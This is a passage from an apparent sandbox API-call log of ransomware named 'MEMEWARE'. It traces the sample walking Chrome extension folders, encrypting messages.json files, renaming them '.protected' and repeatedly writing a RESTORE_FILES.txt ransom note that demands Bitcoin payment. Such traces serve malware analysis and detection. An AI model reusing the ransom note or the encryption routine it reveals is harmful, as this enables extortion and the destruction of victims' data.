pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\RESTORE_FILES.txt") returned 159 [0080.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.054] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.054] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.055] lstrlenA (lpString="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") returned 684 [0080.055] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.055] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.055] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.055] CloseHandle (hObject=0x164) returned 1 [0080.055] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.055] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0080.055] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0080.055] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0080.055] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0080.055] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0080.055] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi") returned 141 [0080.055] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0080.055] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0080.055] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\*") returned 143 [0080.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.056] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.056] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.056] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.056] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.056] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.056] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\.") returned 143 [0080.056] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.056] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.056] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.056] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.056] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.056] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.056] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.056] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\..") returned 144 [0080.056] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.056] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.056] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.056] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.056] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.056] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.056] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.056] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.056] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json") 
returned 155 [0080.056] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.056] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.056] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.056] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json") returned 155 [0080.057] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json") returned 155 [0080.057] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json") returned 155 [0080.057] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.057] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdc, lpOverlapped=0x0) returned 1 [0080.058] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.058] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdc, lpOverlapped=0x0) returned 1 [0080.058] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.058] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.058] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.058] CloseHandle (hObject=0x168) returned 1 [0080.058] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.protected") returned 165 [0080.058] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.protected")) returned 1 [0080.059] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.059] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.059] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\RESTORE_FILES.txt") returned 159 [0080.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.059] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.059] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.060] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.060] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.060] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.060] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.060] CloseHandle (hObject=0x164) returned 1 [0080.060] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.060] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0080.060] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0080.060] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0080.060] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0080.060] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0080.060] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil") returned 142 [0080.060] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0080.060] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0080.060] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\*") returned 144 [0080.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.060] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.060] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.060] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.060] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.061] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.061] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\.") returned 144 [0080.061] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.061] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.061] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.061] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.061] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.061] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.061] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.061] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\..") returned 145 [0080.061] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.061] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.061] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.061] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0080.061] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.061] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.061] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.061] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.061] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json") returned 156 [0080.061] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.061] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.061] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.061] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.062] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json") returned 156 [0080.062] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.062] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json") returned 156 [0080.062] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.062] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json") returned 156 [0080.062] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.062] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0080.063] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.063] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0080.063] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.063] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.063] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.063] CloseHandle (hObject=0x168) returned 1 [0080.063] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.protected") returned 166 [0080.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.protected")) returned 1 [0080.064] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.064] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.064] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\RESTORE_FILES.txt") returned 160 [0080.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.064] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure 